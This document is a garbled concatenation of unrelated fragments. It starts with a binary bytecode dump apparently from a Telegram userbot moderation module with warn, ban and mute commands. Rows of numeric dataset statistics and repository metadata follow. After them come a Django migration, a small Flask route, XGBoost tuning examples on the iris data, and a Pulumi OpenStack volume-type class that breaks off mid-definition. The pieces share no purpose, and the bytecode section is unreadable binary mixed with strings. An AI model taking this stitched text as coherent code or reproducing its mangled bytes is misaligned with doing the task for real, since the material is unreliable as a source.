\x00r\xb3\x00\x00\x00r\xb4\x00\x00\x00r\xb5\x00\x00\x00r\xb6\x00\x00\x00r\xb7\x00\x00\x00r\xb8\x00\x00\x00r\xb9\x00\x00\x00r\x87\x00\x00\x00r\xba\x00\x00\x00r\x7f\x00\x00\x00r\xbb\x00\x00\x00r\xbc\x00\x00\x00r\xbd\x00\x00\x00z\x1b`I can\'t unlock nothing !!`z\x17`Invalid unlock type:` r\xbe\x00\x00\x00r\xbf\x00\x00\x00z\n`Unlocked 
r\xc0\x00\x00\x00r\xc1\x00\x00\x00r\xc2\x00\x00\x00)\x10r\xa4\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\x86\x00\x00\x00r4\x00\x00\x00r\xae\x00\x00\x00r\xb0\x00\x00\x00r\xc6\x00\x00\x00r\xc7\x00\x00\x00r\xc8\x00\x00\x00r\xc9\x00\x00\x00r\xca\x00\x00\x00r\xcb\x00\x00\x00r\xcc\x00\x00\x00Z\runlock_rightsr\x8a\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\trem_locks\xd3\x03\x00\x00s\xa8\x00\x00\x00\x00\x02\x10\x01\x06\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x08\x01\x04\x01\x08\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\n\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x06\x02\x06\x01\x10\x01\x04\x02\x16\x01\x04\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf5\x06\r\x02\x01\x04\x01\x04\x01\x02\xff\x04\xff\n\x03\x1c\x01\x12\x01\x04\x01\x0c\xff\n\x02r\xce\x00\x00\x00z\x11^.warn(?: 
|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sd\x01\x00\x00|\x00j\x00r\nd\x00S\x00|\x00\xa0\x01\xa1\x00I\x00d\x00H\x00}\x01|\x01j\x02}\x02|\x01j\x03}\x03|\x00j\x04\xa0\x05d\x01\xa1\x01}\x04|\x00\xa0\x06\xa1\x00I\x00d\x00H\x00}\x05|\x02sZ|\x03sZ|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00t\x08|\x00j\t|\x05j\n\x83\x02I\x00d\x00H\x00r~|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00S\x00t\x0b\xa0\x0c|\x00j\t\xa1\x01\\\x02}\x06}\x07t\x0b\xa0\r|\x05j\n|\x00j\t|\x04\xa1\x03\\\x02}\x08}\t|\x08|\x06k\x05\x90\x01r"|\x00j\x0ej\x0f|\x01|\x05j\nd\x00d\x04d\x05\x8d\x04I\x00d\x00H\x00\x01\x00|\x07r\xf6d\x06\xa0\x10|\x06|\x05j\n\xa1\x02}\n|\x00j\x0e\xa0\x11|\x00j\t|\x05j\n\xa1\x02I\x00d\x00H\x00\x01\x00n*|\x00j\x0ej\x0f|\x01|\x05j\nd\x00d\x04d\x05\x8d\x04I\x00d\x00H\x00\x01\x00d\x07\xa0\x10|\x06|\x05j\n\xa1\x02}\nn*d\x08\xa0\x10|\x05j\n|\x08|\x06\xa1\x03}\n|\x04\x90\x01rL|\nd\t\xa0\x10t\x12\xa0\x13|\x04\xa1\x01\xa1\x017\x00}\n|\x00j\x07|\nd\nd\x0b\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\x0cNro\x00\x00\x00\xfa\x1a`Bruh I Am Not Admin Here`z\x12`User is an admin`F)\x02r \x00\x00\x00r!\x00\x00\x00zG{} warnings, <u><a href=\'tg://user?id={}\'>user</a></u> has been kicked!zG{} warnings, <u><a href=\'tg://user?id={}\'>user</a></u> has been banned!zJ<u><a href=\'tg://user?id={}\'>user</a></u> has {}/{} warnings... 
watch out!z\x19\nReason for last warn:\n{}r|\x00\x00\x00r}\x00\x00\x00)\x14\xda\x08fwd_fromr0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00r/\x00\x00\x00r.\x00\x00\x00r\x06\x00\x00\x00r:\x00\x00\x00r\x85\x00\x00\x00\xda\x03sql\xda\x10get_warn_settingZ\twarn_userr6\x00\x00\x00Z\x10edit_permissionsr\x95\x00\x00\x00r\x88\x00\x00\x00r|\x00\x00\x00Z\x06escape)\x0br\xa4\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00Z\x0bwarn_reason\xda\rreply_message\xda\x05limit\xda\tsoft_warn\xda\tnum_warns\xda\x07reasonsrZ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x01_*\x04\x00\x00s2\x00\x00\x00\x00\x02\x06\x01\x04\x01\x0e\x01\x06\x01\x06\x01\x0c\x01\x0e\x02\x08\x01\x10\x01\x04\x02\x14\x01\x10\x02\x10\x01\x16\x01\n\x01\x1c\x01\x04\x01\x0e\x01\x1a\x02\x1c\x01\x10\x02\x10\x01\x06\x01\x14\x02r\xd8\x00\x00\x00z\x15^.getwarns(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xb0\x00\x00\x00|\x00j\x00r\nd\x00S\x00|\x00\xa0\x01\xa1\x00I\x00d\x00H\x00}\x01t\x02\xa0\x03|\x01j\x04|\x00j\x05\xa1\x02}\x02|\x02r\x9c|\x02d\x01\x19\x00d\x01k\x03r\x9c|\x02\\\x02}\x03}\x04t\x02\xa0\x06|\x00j\x05\xa1\x01\\\x02}\x05}\x06|\x04r\x82d\x02\xa0\x07|\x03|\x05\xa1\x02}\x07|\x07d\x037\x00}\x07|\x07|\x047\x00}\x07|\x00\xa0\x08|\x07\xa1\x01I\x00d\x00H\x00\x01\x00q\xac|\x00\xa0\x08d\x04\xa0\x07|\x03|\x05\xa1\x02\xa1\x01I\x00d\x00H\x00\x01\x00n\x10|\x00\xa0\x08d\x05\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x06Nr\x01\x00\x00\x00z8This user has {}/{} warnings, for the following reasons:z\x02\r\nz>This user has {} / {} warning, but no reasons for any of them.z"This user hasn\'t got any 
warnings!)\tr\xd0\x00\x00\x00r/\x00\x00\x00r\xd1\x00\x00\x00Z\tget_warnsr\x85\x00\x00\x00r:\x00\x00\x00r\xd2\x00\x00\x00r\x95\x00\x00\x00r.\x00\x00\x00)\x08r\xa4\x00\x00\x00r\xd3\x00\x00\x00\xda\x06resultr\xd6\x00\x00\x00r\xd7\x00\x00\x00r\xd4\x00\x00\x00r\xd5\x00\x00\x00\xda\x04textr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\xd8\x00\x00\x00L\x04\x00\x00s\x1c\x00\x00\x00\x00\x02\x06\x01\x04\x01\x0e\x01\x10\x01\x10\x01\x08\x01\x10\x01\x04\x01\x0c\x01\x08\x01\x08\x01\x12\x02\x1a\x02z\x17^.strongwarn(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00s\xe6\x00\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x00H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x00j\x03\xa0\x04d\x01\xa1\x01}\x04|\x02sB|\x03sB|\x00\xa0\x05d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x04r\xac|\x04d\x03k\x06rpt\x06\xa0\x07|\x00j\x08d\x04\xa1\x02\x01\x00|\x00\xa0\x05d\x05\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x04d\x06k\x06r\x9at\x06\xa0\x07|\x00j\x08d\x07\xa1\x02\x01\x00|\x00\xa0\x05d\x08\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x05d\t\xa1\x01I\x00d\x00H\x00\x01\x00n6t\x06\xa0\t|\x00j\x08\xa1\x01\\\x02}\x05}\x06|\x06r\xd2|\x00\xa0\x05d\n\xa1\x01I\x00d\x00H\x00\x01\x00n\x10|\x00\xa0\x05d\x0b\xa1\x01I\x00d\x00H\x00\x01\x00d\x0cS\x00)\rNro\x00\x00\x00r\xcf\x00\x00\x00)\x02Z\x02onZ\x03yesFz\x1eWarn Strength Set To Ban User.)\x02Z\x03offZ\x02noTz\x1fWarn Strength Set To Kick User.z\x1a`Please send Correct Arg!`z I Am **kicking** User\'s For Now.z\x1fI Am **Baning** User\'s For 
Now.rA\x00\x00\x00)\nr0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00r.\x00\x00\x00r\xd1\x00\x00\x00\xda\x11set_warn_strengthr:\x00\x00\x00r\xd2\x00\x00\x00)\x07r\xa4\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00r\xa5\x00\x00\x00r\xd4\x00\x00\x00r\xd5\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\xdb\x00\x00\x00_\x04\x00\x00s,\x00\x00\x00\x00\x02\x0e\x01\x06\x01\x06\x01\x0c\x02\x08\x01\x10\x01\x04\x02\x04\x01\x08\x01\x0e\x01\x10\x01\x04\x02\x08\x01\x0e\x01\x10\x01\x04\x03\x12\x02\x10\x01\x04\x01\x12\x02\x10\x01r\xdb\x00\x00\x00z\x14^.setwarn(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00s\xbc\x00\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x00H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x00j\x03\xa0\x04d\x01\xa1\x01}\x04|\x02sB|\x03sB|\x00\xa0\x05d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x04r\x92t\x06|\x04\x83\x01d\x03k\x00rd|\x00\xa0\x05d\x04\xa1\x01I\x00d\x00H\x00\x01\x00q\xb8t\x07\xa0\x08|\x00j\tt\x06|\x04\x83\x01\xa1\x02\x01\x00|\x00\xa0\x05d\x05\xa0\n|\x04\xa1\x01\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n&t\x07\xa0\x0b|\x00j\t\xa1\x01\\\x02}\x05}\x06|\x00\xa0\x05d\x06\xa0\n|\x05\xa1\x01\xa1\x01I\x00d\x00H\x00\x01\x00d\x07S\x00)\x08Nro\x00\x00\x00r\xcf\x00\x00\x00\xe9\x03\x00\x00\x00z\x1e`The minimum warn limit is 3!`z\x1e`Updated the warn limit to` {}z\x1e`The current warn limit is {}`rA\x00\x00\x00)\x0cr0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00r.\x00\x00\x00r\x9f\x00\x00\x00r\xd1\x00\x00\x00\xda\x0eset_warn_limitr:\x00\x00\x00r\x95\x00\x00\x00r\xd2\x00\x00\x00)\x07r\xa4\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00r\xc4\x00\x00\x00r\xd4\x00\x00\x00r\xd5\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\xdd\x00\x00\x00\x7f\x04\x00\x00s \x00\x00\x00\x00\x02\x0e\x01\x06\x01\x06\x01\x0c\x02\x08\x01\x10\x01\x04\x02\x04\x01\x0c\x01\x12\x02\x12\x01\x16\x01\x06\x03\x10\x01\x16\x01r\xdd\x00\x00\x00z\x17^.resetwarns(?: 
|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00s<\x00\x00\x00|\x00j\x00r\nd\x00S\x00|\x00\xa0\x01\xa1\x00I\x00d\x00H\x00}\x01t\x02\xa0\x03|\x01j\x04|\x00j\x05\xa1\x02\x01\x00|\x00\xa0\x06d\x01\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x02Nz\x19Warnings have been reset!)\x07r\xd0\x00\x00\x00r/\x00\x00\x00r\xd1\x00\x00\x00Z\x0breset_warnsr\x85\x00\x00\x00r:\x00\x00\x00r.\x00\x00\x00)\x02r\xa4\x00\x00\x00r\xd3\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\xd8\x00\x00\x00\x98\x04\x00\x00s\n\x00\x00\x00\x00\x02\x06\x01\x04\x01\x0e\x01\x10\x01r?\x00\x00\x00a\xd1\x05\x00\x00`.promote` <username/reply> <custom rank (optional)>\nUsage: Provides admin rights to the person in the chat.\n\n`.demote` <username/reply>\nUsage: Revokes the person\'s admin permissions in the chat.\n\n`.ban` <username/reply> <reason (optional)>\nUsage: Bans the person off your chat.\n\n`.unban` <username/reply>\nUsage: Removes the ban from the person in the chat.\n\n`.mute` <username/reply> <reason (optional)>\nUsage: Mutes the person in the chat, works on admins too.\n\n`.unmute` <username/reply>\nUsage: Removes the person from the muted list.\n\n`.gmute` <username/reply> <reason (optional)>\nUsage: Mutes the person in all groups you have in common with them.\n\n`.ungmute` <username/reply>\nUsage: Reply someone\'s message with .ungmute to remove them from the gmuted list.\n\n`.zombies`\nUsage: Searches for deleted accounts in a group. 
Use .zombies clean to remove deleted accounts from the group.\n\n`.admins`\nUsage: Retrieves a list of admins in the chat.\n\n`.kick`\nUsage: kick users from groups.\n\n`.users` or `.users` <name of member>\nUsage: Retrieves all (or queried) users in the chat.\n\n`.setgpic` <reply to image>\nUsage: Changes the group\'s display picture.\n\n`.warn reason`\nUsage: warns users.\n\n`.resetwarns`\nUsage: Reset user\'s warns.\n\n`.getwarns`\nUsage: Shows the reason of warning.\n\n`.setflood` value.\nUsage:Sets flood limit in the current chat.\n\n`.strongwarn` <yes/on or no/off>.\nUsage:sets warn mode i.e <strong warn:bans user, soft warn: kicks user>.\n\n`.setwarn` value.\nUsage:sets warn limit.)Z\xda\x07__doc__Z\x07asyncior\x02\x00\x00\x00\xda\x02osr\x03\x00\x00\x00\xda\x02io\xda\x02rer|\x00\x00\x00Z\x07loggingZ$userbot.modules.sql_helper.warns_sql\xda\x07modulesZ\nsql_helperZ\twarns_sqlr\xd1\x00\x00\x00Z\x08telethonr\x04\x00\x00\x00r\x05\x00\x00\x00Z\x13userbot.utils.toolsr\x06\x00\x00\x00Z\x0ftelethon.errorsr\x07\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r\x0b\x00\x00\x00Z\x1ctelethon.errors.rpcerrorlistr\x0c\x00\x00\x00r\r\x00\x00\x00Z\x1etelethon.tl.functions.channelsr\x0e\x00\x00\x00r\x0f\x00\x00\x00r\x10\x00\x00\x00Z\x1etelethon.tl.functions.messagesr\x11\x00\x00\x00Z\x11telethon.tl.typesr\x12\x00\x00\x00r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00r\x18\x00\x00\x00Z\x07userbotr\x19\x00\x00\x00r\x1a\x00\x00\x00r\x1b\x00\x00\x00r\x1c\x00\x00\x00Z\x0btelethon.tlr\x1d\x00\x00\x00r\x1e\x00\x00\x00Z\x0euserbot.eventsr\x1f\x00\x00\x00r<\x00\x00\x00r=\x00\x00\x00r3\x00\x00\x00rM\x00\x00\x00ra\x00\x00\x00r;\x00\x00\x00Z\rCHAT_PP_ERRORr9\x00\x00\x00rV\x00\x00\x00r\\\x00\x00\x00rb\x00\x00\x00Z\rUNMUTE_RIGHTSrB\x00\x00\x00rS\x00\x00\x00rT\x00\x00\x00r[\x00\x00\x00r]\x00\x00\x00rc\x00\x00\x00re\x00\x00\x00rj\x00\x00\x00rl\x00\x00\x00rn\x00\x00\x00rw\x00\x00\x00r\x82\x00\x00\x00r\x87\x00\x00\x00r\x8b\x00\x00\x00r\x9b\x00\x0
0\x00rK\x00\x00\x00r\x84\x00\x00\x00r\xaa\x00\x00\x00r\xab\x00\x00\x00r\xac\x00\x00\x00r\xcd\x00\x00\x00r\xce\x00\x00\x00r\xd8\x00\x00\x00r\xdb\x00\x00\x00r\xdd\x00\x00\x00\xda\x06updater@\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x08<module>\x06\x00\x00\x00s\xce\x00\x00\x00\x04\x04\x0c\x01\x0c\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x18\x01\x10\x01\x0c\x02\x1c\x03\x10\x02\x14\x03\x0c\x01$\x05\x18\x01\x10\x01\x0c\x03\x04\x01\x04\x01\x04\x01\x04\x01\x04\x02\x04\x01\x04\x03\x04\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf7\x06\x0c\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf8\x06\x0b\x0c\x02\x0c\x04\n\x01\n$\n\x01\n1\n\x01\n0\n\x01\n4\n\x01\n$\n\x01\n;\n\x01\n/\x08\x01\n\x1e\n\x01\n*\n\x01\n+\x0c\x01\nG\n\x01\n\x13\n\x01\n,\n\x01\n)\n\x01\n\'\x08%\x08\r\n\x01\n\'\x08%\x08\x0c\n\x01\nW\n\x01\nV\n\x01\n!\n\x01\n\x12\n\x01\n\x1f\n\x01\n\x18\n\x01\n\t\x04\x01\x02\x01\x02\xfe'))
| 14,907.5
| 59,559
| 0.750629
| 12,785
| 59,630
| 3.490418
| 0.09824
| 0.202622
| 0.103261
| 0.071261
| 0.649367
| 0.602443
| 0.562734
| 0.513322
| 0.47702
| 0.441927
| 0
| 0.344641
| 0.013768
| 59,630
| 4
| 59,559
| 14,907.5
| 0.414171
| 0.000872
| 0
| 0
| 0
| 7.5
| 0.450862
| 0.414355
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 11
|
20486bca28bdf6ba8e900010d2f129354d9cb3d7
| 7,271
|
py
|
Python
|
policykit/constitution/migrations/0002_auto_20210909_1512.py
|
mashton/policyk
|
623523d76d63c06b6d559ad7b477d80512fbd2e7
|
[
"MIT"
] | 78
|
2020-05-08T17:25:38.000Z
|
2022-01-13T05:44:50.000Z
|
policykit/constitution/migrations/0002_auto_20210909_1512.py
|
mashton/policyk
|
623523d76d63c06b6d559ad7b477d80512fbd2e7
|
[
"MIT"
] | 302
|
2020-02-20T07:04:30.000Z
|
2022-02-25T17:44:23.000Z
|
policykit/constitution/migrations/0002_auto_20210909_1512.py
|
mashton/policyk
|
623523d76d63c06b6d559ad7b477d80512fbd2e7
|
[
"MIT"
] | 13
|
2020-04-17T19:44:26.000Z
|
2022-02-25T17:18:04.000Z
|
# Generated by Django 3.2.2 on 2021-09-09 15:12
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration (Django 3.2.2, 2021-09-09 15:12).

    Re-declares the six policy-code text fields (check / fail / filter /
    initialize / notify / success) on each of the six constitution proposal
    models as blank-able ``TextField``s with human-readable verbose names.
    """

    dependencies = [
        ('constitution', '0001_initial'),
    ]

    # Every model gets the identical set of six field alterations, so the
    # 36 AlterField operations are built with plain loops instead of being
    # spelled out by hand.  Ordering matches the original migration exactly:
    # models in alphabetical order, fields in check / fail / filter /
    # initialize / notify / success order.
    _MODEL_NAMES = (
        'policykitaddconstitutionpolicy',
        'policykitaddplatformpolicy',
        'policykitaddtriggerpolicy',
        'policykitchangeconstitutionpolicy',
        'policykitchangeplatformpolicy',
        'policykitchangetriggerpolicy',
    )
    _FIELD_LABELS = (
        ('check', 'Check'),
        ('fail', 'Fail'),
        ('filter', 'Filter'),
        ('initialize', 'Initialize'),
        ('notify', 'Notify'),
        ('success', 'Pass'),
    )

    operations = []
    for _model in _MODEL_NAMES:
        for _field, _label in _FIELD_LABELS:
            operations.append(
                migrations.AlterField(
                    model_name=_model,
                    name=_field,
                    field=models.TextField(blank=True, verbose_name=_label),
                )
            )
    # Drop the loop variables so they don't linger as class attributes.
    del _model, _field, _label
| 37.479381
| 74
| 0.592903
| 567
| 7,271
| 7.474427
| 0.075838
| 0.169891
| 0.212364
| 0.246343
| 0.96555
| 0.96555
| 0.716612
| 0.716612
| 0.716612
| 0.716612
| 0
| 0.003704
| 0.294595
| 7,271
| 193
| 75
| 37.673575
| 0.822578
| 0.006189
| 0
| 0.962567
| 1
| 0
| 0.20598
| 0.142027
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.032086
| 0.005348
| 0
| 0.02139
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
204be9a386fb0960de9606f234662254ea194ccd
| 167
|
py
|
Python
|
app/views/index.py
|
aluisq/flask_mysql_jinja
|
6fc9bd23ac31647744be0a1016bca42e2bc32961
|
[
"MIT"
] | null | null | null |
app/views/index.py
|
aluisq/flask_mysql_jinja
|
6fc9bd23ac31647744be0a1016bca42e2bc32961
|
[
"MIT"
] | null | null | null |
app/views/index.py
|
aluisq/flask_mysql_jinja
|
6fc9bd23ac31647744be0a1016bca42e2bc32961
|
[
"MIT"
] | null | null | null |
from app import cursor, app
from flask import render_template, request, redirect, url_for
@app.route("/")
def index():
    """Serve the site root by rendering the public landing page."""
    landing_page = 'public/index.html'
    return render_template(landing_page)
| 27.833333
| 61
| 0.754491
| 24
| 167
| 5.125
| 0.708333
| 0.227642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125749
| 167
| 6
| 62
| 27.833333
| 0.842466
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
64ceb5e5c87167c39b8afcdd2cceb598e3a35691
| 3,207
|
py
|
Python
|
examples/classification_iris/classification_xgb_iris.py
|
c60evaporator/param-tuning-utility
|
80625f875428badac37d8439195a9327a565b040
|
[
"BSD-3-Clause"
] | null | null | null |
examples/classification_iris/classification_xgb_iris.py
|
c60evaporator/param-tuning-utility
|
80625f875428badac37d8439195a9327a565b040
|
[
"BSD-3-Clause"
] | null | null | null |
examples/classification_iris/classification_xgb_iris.py
|
c60evaporator/param-tuning-utility
|
80625f875428badac37d8439195a9327a565b040
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T05:13:07.000Z
|
2022-01-06T05:13:07.000Z
|
# %% XGBClassifier tuning examples: GridSearch / RandomSearch /
# BayesianOptimization / Optuna.  Each section below was originally a
# near-verbatim copy of the same load/tune/plot code; the shared parts are
# factored into small helpers so each cell only names its search strategy.
import parent_import
import seaborn as sns
from sklearn.model_selection import KFold
from tune_easy import XGBClassifierTuning

TARGET_VARIABLE = 'species'  # Target variable (fixes original "VARIALBLE" typo)
USE_EXPLANATORY = ['petal_width', 'petal_length', 'sepal_width', 'sepal_length']  # Explanatory variables


def _make_tuning():
    """Load the iris dataset and return a fresh XGBClassifierTuning instance."""
    iris = sns.load_dataset("iris")
    y = iris[TARGET_VARIABLE].values
    X = iris[USE_EXPLANATORY].values
    return XGBClassifierTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)


def _cv():
    """Return a fresh 3-fold shuffled CV splitter; fixed seed for reproducibility."""
    return KFold(n_splits=3, shuffle=True, random_state=42)


def _plot_results(tuning):
    """Draw the standard set of post-tuning diagnostic plots."""
    tuning.plot_search_history()
    tuning.plot_search_map()
    tuning.plot_best_learning_curve()
    tuning.plot_best_validation_curve()
    tuning.plot_param_importances()


# %% XGBClassifier, GridSearch, no argument
tuning = _make_tuning()
# Only the grid-search example inspects the validation curves up front.
tuning.plot_first_validation_curve(cv=_cv())
tuning.grid_search_tuning(cv=_cv())
_plot_results(tuning)

# %% XGBClassifier, RandomSearch, no argument
tuning = _make_tuning()
tuning.random_search_tuning(cv=_cv())
_plot_results(tuning)

# %% XGBClassifier, BayesianOptimization, no argument
tuning = _make_tuning()
tuning.bayes_opt_tuning(cv=_cv())
_plot_results(tuning)

# %% XGBClassifier, Optuna, no argument
tuning = _make_tuning()
tuning.optuna_tuning(cv=_cv())
_plot_results(tuning)

# %%
| 39.109756
| 105
| 0.817275
| 434
| 3,207
| 5.74424
| 0.147465
| 0.084236
| 0.048135
| 0.050542
| 0.949057
| 0.949057
| 0.934617
| 0.934617
| 0.934617
| 0.934617
| 0
| 0.005118
| 0.086062
| 3,207
| 81
| 106
| 39.592593
| 0.845445
| 0.145307
| 0
| 0.923077
| 0
| 0
| 0.083854
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.307692
| 0
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
b3b8e0750f59d4a269e55ec3576828783e7ee68d
| 16,837
|
py
|
Python
|
sdk/python/pulumi_openstack/blockstorage/volume_type_v3.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/blockstorage/volume_type_v3.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/blockstorage/volume_type_v3.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['VolumeTypeV3Args', 'VolumeTypeV3']
@pulumi.input_type
class VolumeTypeV3Args:
    """Input-argument bag accepted when constructing a ``VolumeTypeV3`` resource."""
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 is_public: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a VolumeTypeV3 resource.
        :param pulumi.Input[str] description: Human-readable description of the port. Changing
               this updates the `description` of an existing volume type.
        :param pulumi.Input[Mapping[str, Any]] extra_specs: Key/Value pairs of metadata for the volume type.
        :param pulumi.Input[bool] is_public: Whether the volume type is public. Changing
               this updates the `is_public` of an existing volume type.
        :param pulumi.Input[str] name: Name of the volume type. Changing this
               updates the `name` of an existing volume type.
        :param pulumi.Input[str] region: The region in which to create the volume. If
               omitted, the `region` argument of the provider is used. Changing this
               creates a new quotaset.
        """
        # Register only the arguments the caller explicitly provided;
        # pulumi.set stores them on the @pulumi.input_type instance so
        # omitted fields remain unset rather than explicitly None.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if extra_specs is not None:
            pulumi.set(__self__, "extra_specs", extra_specs)
        if is_public is not None:
            pulumi.set(__self__, "is_public", is_public)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if region is not None:
            pulumi.set(__self__, "region", region)
    # The accessors below delegate to pulumi.get/pulumi.set so the SDK can
    # track inputs; @pulumi.getter(name=...) maps snake_case Python names to
    # the provider's camelCase keys where the two differ.
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Human-readable description of the port. Changing
        this updates the `description` of an existing volume type.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="extraSpecs")
